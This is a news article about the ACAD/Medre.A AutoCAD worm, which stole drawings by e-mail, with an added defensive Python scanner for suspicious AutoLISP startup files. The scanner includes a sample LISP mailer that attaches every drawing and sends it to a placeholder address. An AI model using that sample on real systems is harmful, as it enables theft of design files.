Industrial espionage worm that sends AutoCAD design data and blueprints to China discovered


A worm that behaves like an industrial spy has been confirmed: it spreads by infecting AutoCAD template files and secretly sends out files such as design data to 43 e-mail addresses in China. Although who is behind it has not been identified, the relay accounts have reportedly been deleted, so no further damage is expected.

The worm is named "ACAD/Medre.A"; it circulated for six months before it first appeared on the experts' monitoring networks.

ACAD/Medre.A was written in AutoLISP, the scripting language used in AutoCAD products, with VBScript used for some individual actions. When it infects a new machine, the worm rewrites the AutoCAD settings and sends the saved drawing data and other files to a total of 43 accounts at the Chinese ISPs "" and "".
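The mechanism above (an AutoLISP startup file that reaches out to COM, gathers drawings and mails them) is exactly what a responder would want to hunt for on shared project folders. The following is an added example written for this page, not code from the article, ESET or Autodesk, and not a signature of the real sample: it walks a directory tree for the AutoLISP auto-load file names AutoCAD runs automatically (acad.lsp, acaddoc.lsp and their compiled .fas forms), pattern-matches their source for the building blocks any LISP mailer needs (COM object creation, Windows Script Host, mail objects or addresses, drawing enumeration), and flags startup files that sit beside .dwg files. The indicator set and the two sample startup files are constructed assumptions for the demo.

```python
"""Hunt AutoCAD auto-load LISP files that look like mail-based exfiltration.

Added example, not from the article, ESET or Autodesk. The indicator patterns
are assumptions about what any LISP mailer must do, not Medre.A signatures.
"""
import re
import tempfile
from pathlib import Path

# File names AutoCAD loads without asking (assumed relevant set for this example)
AUTOLOAD_NAMES = {"acad.lsp", "acaddoc.lsp", "acad.fas", "acaddoc.fas", "acad.mnl"}

INDICATORS = {
    # Creating COM objects is how AutoLISP reaches outside the drawing
    "com_object": re.compile(r"vlax-(?:get-or-)?create-object", re.I),
    # Windows Script Host / file-system objects: writing or running a .vbs
    "script_host": re.compile(r"WScript\.Shell|Scripting\.FileSystemObject", re.I),
    "vbs_drop": re.compile(r"\.vbs\b|[cw]script\.exe", re.I),
    # Mail-capable COM servers and SMTP configuration fields
    "mailer": re.compile(r"CDO\.Message|Outlook\.Application|smtpserver|sendusing", re.I),
    "email_address": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    # Enumerating drawing files is what a design-data stealer has to do
    "drawing_harvest": re.compile(r"vl-directory-files|\*\.dwg|\*\.dxf", re.I),
}


def scan_source(text: str) -> dict[str, list[str]]:
    """Return indicator name -> distinct matched strings (empty dict if none)."""
    hits = {}
    for name, pattern in INDICATORS.items():
        found = sorted({m.group(0) for m in pattern.finditer(text)})
        if found:
            hits[name] = found
    return hits


def verdict(hits: dict[str, list[str]]) -> str:
    """'exfil' if the file escapes LISP, finds drawings and talks mail;
    'suspicious' if it escapes LISP or mentions mail at all; else 'clean'."""
    escapes = any(k in hits for k in ("com_object", "script_host", "vbs_drop"))
    mails = "mailer" in hits or "email_address" in hits
    harvests = "drawing_harvest" in hits
    if escapes and mails and harvests:
        return "exfil"
    if escapes or mails:
        return "suspicious"
    return "clean"


def scan_tree(root: Path) -> list[dict]:
    """Walk root for auto-load files and rate each one.

    A startup file lying next to .dwg files is flagged separately: that is the
    placement a worm needs in order to be loaded whenever the project is opened.
    """
    results = []
    for path in sorted(root.rglob("*")):
        if path.name.lower() not in AUTOLOAD_NAMES:
            continue
        beside = any(p.suffix.lower() in (".dwg", ".dwt", ".dxf")
                     for p in path.parent.iterdir())
        if path.suffix.lower() == ".fas":
            # Compiled LISP carries no readable source; hand it to an analyst
            hits, rating = {}, "review-compiled"
        else:
            hits = scan_source(path.read_text(encoding="latin-1"))
            rating = verdict(hits)
        results.append({"path": str(path), "beside_drawings": beside,
                        "hits": hits, "verdict": rating})
    return results


# Constructed samples for the demo (not real worm code)
BENIGN_ACADDOC = """;; project startup: load a layer-naming helper
(load "C:/cad/tools/layers.lsp")
(princ "\\nLayer tools loaded.")
"""

SUSPICIOUS_ACADDOC = """;; looks like a startup file but mails every drawing it can find
(vl-load-com)
(setq msg (vlax-create-object "CDO.Message"))
(setq fields (vlax-get-property (vlax-get-property msg 'Configuration) 'Fields))
(vlax-put-property (vlax-get-property fields 'Item
  "http://schemas.microsoft.com/cdo/configuration/smtpserver") 'Value "smtp.example.invalid")
(foreach f (vl-directory-files (getvar "DWGPREFIX") "*.dwg" 1)
  (vlax-invoke msg 'AddAttachment (strcat (getvar "DWGPREFIX") f)))
(vlax-put-property msg 'To "drop@example.invalid")
(vlax-invoke msg 'Send)
"""


def demo() -> list[dict]:
    """Build a throwaway 'project' and 'support' folder, then scan both."""
    with tempfile.TemporaryDirectory() as tmp:
        proj = Path(tmp) / "project"
        proj.mkdir()
        (proj / "site-plan.dwg").write_bytes(b"AC1024")  # placeholder, not a real drawing
        (proj / "acaddoc.lsp").write_text(SUSPICIOUS_ACADDOC)
        support = Path(tmp) / "support"
        support.mkdir()
        (support / "acaddoc.lsp").write_text(BENIGN_ACADDOC)
        return scan_tree(Path(tmp))


if __name__ == "__main__":
    for r in demo():
        print(f"{r['path']}: {r['verdict']} (beside drawings: {r['beside_drawings']})")
```

Point the scanner at file shares holding shared drawings rather than only at workstations: the design-data exposure described in the article comes from startup files travelling with project folders, and a compiled .fas auto-loader beside .dwg files is worth manual review even though it yields no indicator hits.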

According to ESET's survey, most of the infected targets are in Peru, but infections have also been seen in other Latin American countries such as Ecuador, as well as in the United States and China.

Infections by country: mostly Peru, followed by Ecuador, Colombia and other Latin American countries.

Types of stolen file. In addition to blueprints and project files, the contents of the desktop, the "Administrator" folder and other data are pulled out.

A sample was also provided to Kaspersky Lab. Dmitry Bestuzhev, head of the Global Research and Analysis Team at Kaspersky Lab in Latin America, analyzes that this worm is not an APT (Advanced Persistent Threat), the kind of attack that persistently targets only specific countries and companies, because the attacks are not controlled at all. According to Bestuzhev, this attack does not appear to have received support from any government. Incidentally, companies that use AutoCAD have also submitted samples.

A RAR file sent from an infected machine

The DXF file included in this RAR archive contains the data needed to use the stolen drawings in the correct environment

ESET contacted Tencent, which administers "", and examined the mail accounts: the inbox had filled up with over 100,000 messages. Most of that bulk mail consisted of bounces saying "the final recipient's inbox is full", and about 5,000 unsent messages remained in the outbox.

Evidence of AutoCAD drawing files (.dwg) being sent

Tencent promptly deleted these accounts in response to ESET's contact, and CVERC (China's National Computer Virus Emergency Response Center) also cooperated in deleting accounts, which ESET says prevented further information leakage.

ACAD/Medre.A targets AutoCAD versions 14.0 to 19.2, and it is thought that it would also work on future releases.

In response to ESET's contact, Autodesk, the developer of AutoCAD, has decided to give this problem its full support.

